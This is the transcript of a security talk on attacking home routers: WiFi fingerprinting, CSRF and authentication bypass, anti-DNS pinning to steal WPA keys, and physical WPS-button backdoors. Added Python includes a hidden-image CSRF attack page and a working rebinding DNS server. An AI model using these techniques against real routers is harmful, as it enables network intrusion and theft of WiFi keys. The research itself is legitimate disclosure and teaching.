Title: Hacking The Network Inside Out
1. Hacking The Network Inside Out
- Craig Heffner, Derek Yap
- SourceSec Security Research
2. Who Are We?
- Co-founders of SourceSec Security Research Group
- Publish research papers, tutorials, exploits, etc.
- Columnist at EthicalHacker.net
3. Presentation Purpose
- Discuss SOHO router attacks
- Performing router reconnaissance
- Identifying router vulnerabilities
- Exploiting vulnerabilities with client-side attacks
- Building hardware back doors
- Release some new tools
- Everybody likes new toys, right?
4. Reconnaissance
5. Router Reconnaissance
- You can't attack what you don't know
- Well, you can, but it's not recommended
- We need to be able to fingerprint routers
- Both externally and via WiFi
- What tools do we have to do this?
- Unfortunately, not many
6. External Router Fingerprinting
- Nmap
- Great scanner, lots of TCP/IP signatures
- But only works if the router has an open WAN port
7. Client-Side Fingerprinting
- Lan Scan
- JavaScript / CSS based LAN scanner
- IDs router make/model and IP address
- http://www.businessinfo.co.uk/
8. JavaScript LAN Scan In Action
9. WiFi Fingerprinting
- There isn't much currently available
- What is available mostly focuses on
- Fingerprinting client drivers
- Fingerprinting individual 802.11 devices
- Typically rely on RF signaling, time skews, etc.
- Not so easy to use / update / maintain
10. 802.11 Information Elements
11. Tool Time: WiFinger
- Passively identifies APs based on beacon packets
- Examines 802.11 Information Elements
- Existence, order, contents, etc.
- Only works on APs that it has signatures for
- Send us pcap files!
12. WiFinger In Action
13. Tool Time: WPScan
- Actively probes the AP for device information
- Takes advantage of the WPS probe response IE
- Can contain lots of juicy info about the device
- Some routers give up more information than others
14. WPScan In Action
15. Tool Time: WPSpy
- Monitors WPS state changes
- Tells you if WPS is configured
- Tells you when a router is listening for WPS clients
16. WPSpy In Action
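All three tools read the same data: the Information Element (IE) list that follows the fixed fields of a beacon or probe response, and, for WPS, the vendor-specific IE (OUI 00:50:F2, type 4) that carries 16-bit type/length TLV attributes. The Python below is an added example written for this page, not the code of WiFinger, WPScan or WPSpy. The beacon frame, the signature table entry and the device strings in it are constructed; the attribute numbers come from the WPS specification. It matches IE order against a signature the way WiFinger does, decodes the Manufacturer / Model Name / Device Name strings WPScan relies on, and derives the WPSpy-style state from the WPS State, Selected Registrar and Device Password ID attributes.

```python
"""Passive and active AP fingerprinting from 802.11 Information Elements.
Added example: the signature table and the sample beacon are constructed, not captured."""
import struct

IE_SSID, IE_VENDOR = 0, 221
WPS_OUI = b"\x00\x50\xf2\x04"      # OUI 00:50:F2, vendor type 4 = WiFi Protected Setup
BEACON_FIXED = 12                   # timestamp(8) + beacon interval(2) + capability(2)
PBC = 0x0004                        # Device Password ID value for push-button configuration

# WPS attribute type -> (name, decoding); values per the WPS spec
WPS_ATTRS = {
    0x1044: ("wps_state", "u8"),            # 1 = not configured, 2 = configured
    0x1041: ("selected_registrar", "u8"),   # 1 = a registrar is active and accepting enrollees
    0x1012: ("device_password_id", "u16"),  # 0x0004 = PBC window is open
    0x1021: ("manufacturer", "str"),
    0x1023: ("model_name", "str"),
    0x1024: ("model_number", "str"),
    0x1011: ("device_name", "str"),
    0x1042: ("serial_number", "str"),
}

# Hypothetical WiFinger-style signature: the IE tags in the order one firmware emits them.
SIGNATURES = {
    (0, 1, 3, 5, 48, 221): "ExampleCo AP-1 (constructed signature, not a real device)",
}


def parse_ies(body):
    """Split a beacon/probe-response body into (tag, value) pairs, stopping on truncation."""
    ies, off = [], BEACON_FIXED
    while off + 2 <= len(body):
        tag, ln = body[off], body[off + 1]
        val = body[off + 2:off + 2 + ln]
        if len(val) < ln:               # truncated frame: do not misparse the tail
            break
        ies.append((tag, val))
        off += 2 + ln
    return ies


def parse_wps(val):
    """Decode the TLV attributes of a WPS vendor IE (big-endian 16-bit type and length)."""
    attrs, data, off = {}, val[len(WPS_OUI):], 0
    while off + 4 <= len(data):
        atype, alen = struct.unpack(">HH", data[off:off + 4])
        raw = data[off + 4:off + 4 + alen]
        if len(raw) < alen:
            break
        if atype in WPS_ATTRS:
            name, kind = WPS_ATTRS[atype]
            if kind == "u8":
                attrs[name] = raw[0]
            elif kind == "u16":
                attrs[name] = struct.unpack(">H", raw)[0]
            else:
                attrs[name] = raw.decode("ascii", "replace")
        off += 4 + alen
    return attrs


def fingerprint(body):
    """WiFinger-style match on IE order plus WPScan/WPSpy-style WPS decoding."""
    ies = parse_ies(body)
    order = tuple(tag for tag, _ in ies)
    ssid = next((v.decode("utf-8", "replace") for t, v in ies if t == IE_SSID), None)
    wps = None
    for tag, val in ies:
        if tag == IE_VENDOR and val.startswith(WPS_OUI):
            wps = parse_wps(val)
    # The AP is taking PBC enrollees only while both of these hold (the two-minute window).
    pbc_open = bool(wps) and wps.get("selected_registrar") == 1 and wps.get("device_password_id") == PBC
    return {"ssid": ssid, "ie_order": order, "match": SIGNATURES.get(order),
            "wps": wps, "wps_pbc_window_open": pbc_open}


# --- constructed sample beacon body (not a real capture) ---
def ie(tag, val):
    return bytes([tag, len(val)]) + val


def wps_attr(atype, val):
    return struct.pack(">HH", atype, len(val)) + val


SAMPLE_BEACON = (
    b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)                # TSF, interval, capability
    + ie(0, b"testnet") + ie(1, b"\x82\x84\x8b\x96") + ie(3, b"\x06") + ie(5, b"\x00\x01\x00\x00")
    + ie(48, b"\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02\x00\x00")  # RSN
    + ie(221, WPS_OUI + wps_attr(0x104a, b"\x10") + wps_attr(0x1044, b"\x02")
          + wps_attr(0x1041, b"\x01") + wps_attr(0x1012, b"\x00\x04")
          + wps_attr(0x1021, b"ExampleCo") + wps_attr(0x1023, b"AP-1")
          + wps_attr(0x1024, b"AP-1 v2") + wps_attr(0x1011, b"ExampleCo Wireless Router"))
)

if __name__ == "__main__":
    print(fingerprint(SAMPLE_BEACON))
```

Selected Registrar = 1 together with Device Password ID = 0x0004 is what an AP advertises during the PBC window, so polling beacons and diffing the returned dict reproduces WPSpy's "listening" notification. Frame capture is deliberately left out: feed the body of a real beacon (everything after the 802.11 header) from a monitor-mode pcap into fingerprint().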
17. Why Do We Want To Know?
- Google for vulnerabilities
- Anything specific for that model router?
- Anything for similar models from the same vendor?
- Get user guide and manufacturer description
- What features does it support?
- Default settings?
- Go get the same router and test it
- Zero days are fun!
18. What Are We Looking For?
- Type of HTTP authentication
- Basic Authentication? HTML form authentication?
- Router host name / default IP address
- Supported features
- WiFi Protected Setup support is a plus
19. WiFi Protected Setup
- Used for WPA key distribution
- Push a button on the router
- Push a button on the client
- Router encrypts the WPA key and sends it to the client
- Not well supported by clients yet
- wpa_supplicant now supports WPS
- Most new routers have WPS enabled by default
20. WiFi Protected Setup
- WPS push button authentication
- Push a button on the router
- Router advertises that it's looking for a client
- Client has two minutes to respond
- Push a button on the client device
- Client checks if the access point is looking for a client
- Client initiates 802.11 EAP exchange
- Router gives the client the encryption key
- Key exchange is encrypted
21. Client-Side Attacks
22. Why Use Client-Side Attacks?
- Most router vulnerabilities exist only on the LAN
- Usually in the Web-based administrative interface
- Routers usually must be managed from the LAN
- Remote management is rarely enabled
- Before we can consider router vulnerabilities
- How do we attack the LAN without direct LAN access?
23. Client-Side Attack Overview
- Use an inside client to help us attack the router
- Typically via the client's Web browser
- We'll cover two primary attack methods
- Cross-Site Request Forgery
- Anti-DNS pinning
- Most other methods aren't as useful in this case
24. CSRF Problems
- For CSRF to work, the router must trust the browser
- No one ever logs into their router
- We can try to force a login, but...
- No auto-login for basic authentication
- http://user:password@192.168.1.1/
- Blocked by IE and FF
- Changes in the IP address range
- If the IP of the router is not known, it can't be targeted
25. CSRF Solutions
- Most new routers make CSRF much easier
- Use HTML forms for submitting authentication
- Assign themselves host names
- Don't distinguish between POST and GET requests
26. Sample CSRF Attack Code
27. Bypassing Authentication
- Some routers don't check if you've logged in
- Don't have to guess any logins
- Makes CSRF attacks much more reliable
- Typically just a direct request to a CGI script
- More common than you might think
- Linksys WRT54G v1.00.9
- 3Com OfficeConnect Wireless Cable/DSL Router
- DD-WRT v24-sp1
- Most Belkin routers
28. CSRF Auth Bypass Attack Code
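Slides 24 through 28 describe what makes the forged request work: the admin interface accepts a GET where a POST was intended, and it either requires no session at all (the auth-bypass case) or takes a default form login, so one hidden <img> on an attacker's page is enough. The Python below is an added example, not the attack code from the slides and not any vendor's firmware. It models a router CGI endpoint twice, once with the behaviour the slides list and once hardened (POST only, logged-in session, per-session token), and replays the same hidden-image request against both. auth_type() is the slide-18 recon check run over a single HTTP response. The endpoint path /cgi-bin/setup.cgi, the parameter names and the address 192.168.2.1 are assumptions.

```python
"""CSRF against a SOHO router admin CGI: the vulnerable behaviour beside a hardened one.
Added example; the endpoint, parameter names and address are assumptions, not a real firmware."""
import re
import secrets
from urllib.parse import urlsplit, parse_qs

ROUTER_HOST = "192.168.2.1"          # assumed LAN address of the target
CGI = "/cgi-bin/setup.cgi"           # assumed configuration endpoint


def auth_type(status, headers, body):
    """Recon: classify the login scheme from one HTTP response to the admin page."""
    if status == 401 and headers.get("WWW-Authenticate", "").lower().startswith("basic"):
        return "basic"   # no auto-login from a URL; CSRF only works if the user is already authed
    if re.search(r'<input[^>]+type=["\']?password', body, re.I):
        return "form"    # a forged request carrying default credentials can log in for us
    return "none"        # no login at all: the auth-bypass case


class Router:
    def __init__(self, hardened):
        self.hardened = hardened
        self.config = {"wps_pbc": "0", "remote_mgmt": "0"}
        self.sessions = {}           # session cookie -> per-session anti-CSRF token

    def login(self):
        """Hardened mode only: a real login yields a session cookie and a token embedded in the page."""
        sid, tok = secrets.token_hex(8), secrets.token_hex(16)
        self.sessions[sid] = tok
        return sid, tok

    def handle(self, method, path, params, cookies=None):
        """Return (status, config). params is the merged query string / form body."""
        cookies = cookies or {}
        if path != CGI:
            return 404, dict(self.config)
        if self.hardened:
            sid = cookies.get("session")
            if method != "POST" or sid not in self.sessions:   # GET never changes state; must be logged in
                return 403, dict(self.config)
            if params.get("token") != self.sessions[sid]:     # token is unreadable cross-site
                return 403, dict(self.config)
        # Vulnerable variant: GET or POST, no session check, applies whatever it is sent
        # (slides 25 and 27: GET == POST, and "some routers don't check if you've logged in").
        for key in self.config:
            if key in params:
                self.config[key] = params[key]
        return 200, dict(self.config)


def attack_page(host=ROUTER_HOST):
    """One hidden image tag, no JavaScript: presses the virtual WPS push button (slide 52)."""
    return (f'<html><body><img src="http://{host}{CGI}?wps_pbc=1" width="1" height="1">'
            '</body></html>')


def forged_request(page):
    """What the victim's browser emits when it renders the attacker's page: a bare GET."""
    src = re.search(r'src="([^"]+)"', page).group(1)
    u = urlsplit(src)
    return "GET", u.path, {k: v[0] for k, v in parse_qs(u.query).items()}


def run_attack(router):
    method, path, params = forged_request(attack_page())
    return router.handle(method, path, params)   # no session cookie, no token: exactly what an <img> gives


if __name__ == "__main__":
    print(run_attack(Router(hardened=False)))    # 200 and wps_pbc flips to "1": WPS window opened
    print(run_attack(Router(hardened=True)))     # 403 and config unchanged: forged GET refused
```

The hardened variant refuses the forged request twice over: an <img> can only produce a GET, and even a forged POST (a hidden auto-submitting form) would lack the per-session token, which the attacker's page cannot read because of the same-domain policy. Note that auth_type() reporting "basic" does not make a device safe, only harder for CSRF; the anti-DNS pinning attack in the next section removes that obstacle.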
29. CSRF Pros
- Login to the router with default credentials
- Or bypass login altogether
- Issue updates to router configuration
- Typically can be done without any JavaScript
30. CSRF Cons
- Not all routers vulnerable to CSRF
- We have to guess the login, or use the default login
- Because of this, it doesn't work against basic auth
- This is mitigated if an auth bypass vulnerability exists
- We can only change settings, not view settings
- Due to the browser's same-domain policy
31. Anti-DNS Pinning
- Using anti-DNS pinning, we can
- Circumvent the same-domain policy
- Load and control the router admin page
- Unlike CSRF, we can use basic authentication
- No router vulnerabilities required!
- This allows us to change and view router settings
- WEP / WPA keys, DNS settings, firewall rules, etc.
32. What Is The Same-Domain Policy?
- Prevents site X from accessing contents of site Y
- Example
- Page on site X creates an iframe that points to site Y
- Iframe is successfully created
- But site X code can't access the iframe contents
33. What Is DNS Pinning?
- Browser caches (pins) the result of the first DNS lookup for a host
- Pin is cleared when the browser is closed
- Prevents evil.com from changing its IP mid-session
- Otherwise the new IP could point at another server (such as the router)
- And script from evil.com would bypass the same-domain policy
34. Anti-DNS Pinning Prerequisites
- We have to know the router IP address
- This is rarely changed from the default
- We have to be able to login
- Use default credentials
- Or circumvent the login process altogether
- We have to own a domain
- DNS server
- Web server
35Browser Queries DNS Server
Client's Router 192.168.1.1
ns1.sourcesec.com
Where is cc.sourcesec.com?
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
36DNS Responds With Two IPs
Client's Router 192.168.1.1
ns1.sourcesec.com
IN A 1.2.3.4 IN A 192.168.1.1
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
37Browser Connects To First IP
Client's Router 192.168.1.1
ns1.sourcesec.com
GET /evil.html HTTP/1.1
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
38Server Responds With Evil Page
Client's Router 192.168.1.1
ns1.sourcesec.com
lthtmlgt ltscriptgt ...Evil Script... lt/scriptgt lt/htm
lgt
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
39Web Service Shuts Down
Client's Router 192.168.1.1
ns1.sourcesec.com
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
40JS Initiates New Connection
Client's Router 192.168.1.1
ns1.sourcesec.com
GET /index.html HTTP/1.1 Host cc.sourcesec.com
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
41Browser Sees A Failed Connection
Client's Router 192.168.1.1
ns1.sourcesec.com
TCP RST Packet
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
42Browser Tries The Second IP
Client's Router 192.168.1.1
ns1.sourcesec.com
GET /index.html HTTP/1.1 Host cc.sourcesec.com
Client Browsing To cc.sourcesec.com
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
43JS Has Full Access To Router Page
Client's Router 192.168.1.1
ns1.sourcesec.com
lthtmlgt lttitlegtHome Routerlt/titlegt ...
Client Browsing To cc.sourcesec.com
cc.sourcesec.com 1.2.3.4
44. Anti-DNS Pinning Pros
- Doesn't rely on any vulnerabilities in the router
- Works with basic authentication
- Allows JS to access the router's Web content
45. Anti-DNS Pinning Cons
- Still have to know / guess the router credentials
- Use default login
- Sends the wrong Host header
- But the router doesn't mind
- Doesn't send cookie credentials
- But routers don't use cookies anyway
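The "DNS server" prerequisite amounts to an authoritative responder that answers the A query for the attack hostname with two records, the attacker's web server first and the victim's router second, plus a browser that falls back to the second address when the first refuses the connection (slides 35 through 43; the DIR-628 attack later in the deck uses the same setup). The Python below is an added example, not the DNS configuration the authors used: it builds the raw DNS response with only the standard library, models the browser's fallback in browser_connect(), and includes a UDP serve() loop. The zone content (cc.sourcesec.com, 1.2.3.4, 192.168.1.1) is taken from the diagrams; everything else is assumed. Caveat: this reproduces the fallback behaviour the slides describe; whether a given browser version still fails over between A records after a refused connection has to be checked rather than assumed.

```python
"""Minimal authoritative DNS responder for an anti-DNS pinning attack (added example).
Answers the attack hostname with two A records: attacker web server first, victim router second."""
import socket
import struct

# Constructed zone: the names and addresses from the slide diagrams.
ZONE = {
    "cc.sourcesec.com.": ["1.2.3.4", "192.168.1.1"],
}
TTL = 1   # short TTL; the attack actually relies on the failed-connection fallback, not on expiry


def parse_name(msg, off):
    """Decode a DNS name at msg[off:], following compression pointers. Returns (name, next_off)."""
    labels = []
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                       # compression pointer to an earlier name
            ptr = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF
            tail, _ = parse_name(msg, ptr)
            return (".".join(labels + [tail]) if labels else tail), off + 2
        off += 1
        if ln == 0:
            return ".".join(labels) + ".", off
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln


def encode_name(name):
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, qid=0x1234):
    """A standard recursion-desired A query, as a resolver would send it."""
    return struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)


def build_response(query):
    """Authoritative answer: every A record in ZONE for the queried name, or NXDOMAIN."""
    qid = struct.unpack(">H", query[:2])[0]
    qname, off = parse_name(query, 12)
    qtype, _ = struct.unpack(">HH", query[off:off + 4])
    question = query[12:off + 4]
    known = qname.lower() in ZONE
    answers = ZONE[qname.lower()] if known and qtype == 1 else []
    rcode = 0 if known else 3
    header = struct.pack(">HHHHHH", qid, 0x8400 | rcode, 1, len(answers), 0, 0)   # QR=1, AA=1
    body = b""
    for ip in answers:
        # name as a pointer to the question (offset 12), type A, class IN, TTL, rdlength 4
        body += b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, TTL, 4) + socket.inet_aton(ip)
    return header + question + body


def parse_answers(resp):
    """Return the A-record addresses in a response, in the order the server listed them."""
    _, _, qd, an, _, _ = struct.unpack(">HHHHHH", resp[:12])
    off = 12
    for _ in range(qd):
        _, off = parse_name(resp, off)
        off += 4
    ips = []
    for _ in range(an):
        _, off = parse_name(resp, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", resp[off:off + 10])
        off += 10
        if rtype == 1:
            ips.append(socket.inet_ntoa(resp[off:off + 4]))
        off += rdlen
    return ips


def browser_connect(ips, reachable):
    """Model of slides 40-42: try each address in order, move on when the connection is refused."""
    for ip in ips:
        if reachable(ip):
            return ip
    return None


def serve(bind="0.0.0.0", port=53):
    """UDP loop answering queries with build_response(); run as root on the attacker's nameserver."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind, port))
    while True:
        query, peer = sock.recvfrom(512)
        try:
            sock.sendto(build_response(query), peer)
        except (IndexError, struct.error):
            pass        # malformed query: drop it
```

Once evil.html is loaded and the web server on 1.2.3.4 is shut down, the script's next request to cc.sourcesec.com gets a RST from 1.2.3.4 and the browser falls through to 192.168.1.1, which is the transition browser_connect() models; from then on the page's JavaScript reads the router's responses under the attacker's origin.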
46. Client-Side WiFi Attacks
47. Why WiFi?
- Often, simply changing settings is not desirable
- Router behind corporate firewall
- More likely to be noticed
- Against pen-test ROE
- WiFi provides direct access to the internal network
- Most other attack methods require a multi-step process
48. Router WiFi Attacks
- Encryption is typically the only real WiFi security
- Traditional WiFi attacks
- Use Kismet / aircrack to crack the WEP key
- WPA / WPA2 are tougher
- Client-side WiFi attacks
- Get the router to give us the encryption key
49. Cracking WPA With HTML Images
- Recall that WPS hands out WPA keys?
- WPS-capable routers have virtual WPS push buttons
- Located in the Web interface
- We can activate WPS via CSRF attacks
- CSRF -> WPS -> WPA key
50. Belkin F5D8233-4v3 CSRF Attack
51. Network Reconnaissance
- Device identification
- WiFinger reports Belkin F5D8233-4v3
- WPScan reports Belkin
- Reconnaissance shows
- Web based login on LAN port 80
- Vulnerable to CSRF and authentication bypass
- WPS enabled by default
- Default IP address 192.168.2.1
52. F5D8233-4v3 Attack
- Use CSRF to activate WPS
- Done with a single hidden image tag
- Listen for activation
- Use WPSpy
- Perform WPS key exchange
- Use a WPS-capable WiFi card
53. HTML Exploit Code
54. Client Visiting Site
55. WPS Push Button Activated
56. Success!
57. CSRF WPS Attack Pros
- Obtain a WPA key of any strength in seconds (no cracking needed)
- Simple attack to implement
58. CSRF WPS Attack Cons
- Requires proximity to the WiFi network
- Requires a CSRF vulnerability
- Requires WPS
59. Cracking WiFi With A DNS Server
- Using an anti-DNS pinning attack, we can
- Retrieve SSID, encryption type and key remotely
- Foil anti-CSRF implementations
- Do so without the aid of WPS
- We will need to know
- Router login
- Router IP
60. DIR-628 Anti-Pinning Attack
61. Network Reconnaissance
- Device identification
- WiFinger reports D-Link DIR-628
- WPScan reports D-Link DIR-628
- Reconnaissance shows
- JavaScript-based anti-CSRF in login page
- User account with read-only access and blank password
- Default IP address of 192.168.0.1
62. DIR-628 Attack
- Can't use CSRF, so we'll have to use anti-pinning
- Attack the user account
- Likely to be ignored / forgotten about
- All D-Links have both admin and user accounts
- Retrieve the WPA key, send it back to our server
63. DNS Configuration
64. Initial Browser Request
65. Browser Window
66. Success!
67. Physical Attacks
68. Probability of Physical Attacks
- If an attacker can obtain access to the router
- Before it enters an organization
- After it is installed inside an organization
- Then there is the threat of physical tampering
- Has happened to many other devices in the past...
69. Hewlett Packard
70. Creative
71. Amazon
72. Best Buy
73. WalMart
74. Physical Router Attacks
- But what can we do with routers?
- Not much without a lot of time and resources
- They run custom firmware
- Firmware will vary between vendors / models / versions
- Any malware will be customized to the vendor / model
- "It's really hard to do, so it's not a threat" (or so the thinking goes)
75. WPS Physical Attacks Made Easy
- Push the router's WPS button
- This is as easy as it gets!
- Backdoor the WiFi encryption
- We are only really concerned with WPA
- WEP / open networks are backdoors in and of themselves
- This can be done very easily thanks to WPS...
76. Hacking With Gum
77. Gum Hack Description
- Short out the WPS button
- The router thinks the button is always pushed
- WPS will always be actively looking for clients!
- Cover up the WPS light
- It blinks when WPS is activated
78. Linksys WRT160N Physical Attack
79. Linksys WRT160N Reconnaissance
- Device identification
- WiFinger reports Linksys WRT160N
- WPScan reports Linksys WRT160N
- Reconnaissance shows
- Uses basic authentication
- No CSRF or authentication bypass vulnerabilities
- XSS vulnerability, but requires LAN access
- WPS enabled by default
80. WPS Button Placement
81. Linksys Board Top View
82. Linksys Board Bottom View
83. Tear Foil
84. Fold Foil
85. Foil Placement
86. Board Placement
87. Foil Fold 2
88. Lights Out
89. Finished
90. Success!
91. Gum Hack Pitfalls
- Noticeable on the Linksys wireless admin page
- Makes it not-so-stealthy
- Some routers require push, hold, release
- Simply shorting the switch doesn't work
92. Improving The Gum Hack
- Shortcomings can be overcome with an NE555 timer
- Small, cheap timer IC
- Easy project, even for hardware beginners
- Works with nearly every WPS-capable router
93. NE555 Circuit Description
- NE555 configured as an astable timer
- Shorts the button pins for 1.5 seconds, every 5 minutes
- Simple circuit, low parts count
- 1 NE555 chip
- 1 Capacitor
- 1 Diode
- 3 Resistors
94. NE555 Circuit Schematic
95. NE555 Linksys
96. NE555 D-Link
97. NE555 Belkin
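The schematic is not reproduced in this transcript, so the Python below is an added example and not the authors' circuit. It assumes the usual variant of the 555 astable in which the diode sits across R2, so the capacitor charges through R1 alone and discharges through R2 alone: output high (button shorted) for ln2·R1·C and low for ln2·R2·C. It computes the resistors for the slide's 1.5 s pulse every 5 minutes, snaps them to E12 values, and reports the timing those values actually produce. The third resistor in the parts list is assumed to be the base resistor of whatever transistor performs the short and does not enter the timing.

```python
"""Timing design for the NE555 astable that pulses the WPS button (added example).
Assumed topology: diode across R2, so t_on = ln2*R1*C and t_off = ln2*R2*C."""
import math

LN2 = math.log(2)      # the 0.693 factor: capacitor swings between 1/3 and 2/3 Vcc
E12 = [1.0, 1.2, 1.5, 1.8, 2.2, 2.7, 3.3, 3.9, 4.7, 5.6, 6.8, 8.2]


def snap_e12(value):
    """Nearest standard E12 component value (by absolute distance, including the next decade's 10)."""
    decade = 10 ** math.floor(math.log10(value))
    candidates = [m * decade for m in E12] + [10 * decade]
    return min(candidates, key=lambda c: abs(c - value))


def astable_times(r1, r2, c):
    """(t_on, t_off) in seconds for the diode-bypassed 555 astable."""
    return LN2 * r1 * c, LN2 * r2 * c


def design(t_on, period, c):
    """Pick E12 resistors for a given capacitor and report the timing they really give."""
    r1 = snap_e12(t_on / (LN2 * c))
    r2 = snap_e12((period - t_on) / (LN2 * c))
    on, off = astable_times(r1, r2, c)
    return {"r1": r1, "r2": r2, "c": c, "t_on": on, "period": on + off}


if __name__ == "__main__":
    # The slide's target: short the button for 1.5 s, once every 5 minutes, with a 1000 uF capacitor.
    print(design(1.5, 300.0, 1000e-6))
```

A five-minute period forces either a very large capacitor or resistances in the hundreds of kilohms; with a 1000 µF electrolytic the values land at 2.2 kΩ and 470 kΩ. Leakage in an electrolytic that size is the main reason the measured period drifts from the calculation, so time the board on the bench before it goes into a router.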
98. Conclusion
- SOHO router security has a long way to go
- This is just a portion of the vulnerabilities and attacks
- WPS is hazardous if the underlying system is vulnerable
- Default logins / authentication bypassing, CSRF attacks
- Physical attacks
- Client side attacks don't just affect the clients
- Can be used to attack internal infrastructure
- Routers are prime targets
99. Q & A
100. Resources
- Visit http://www.sourcesec.com for
- Tools
- Slides
- Papers
- Schematics
- Email us
- dev@sourcesec.com
101. References
- Intranet Invasion Through Anti-DNS Pinning
- David Byrne, BlackHat 2007
- DNS problems with new DNS cache, Bugzilla
- https://bugzilla.mozilla.org/show_bug.cgi?id=162871
- WiFi Protected Setup Knowledge Center
- http://www.wi-fi.org/wifi-protected-setup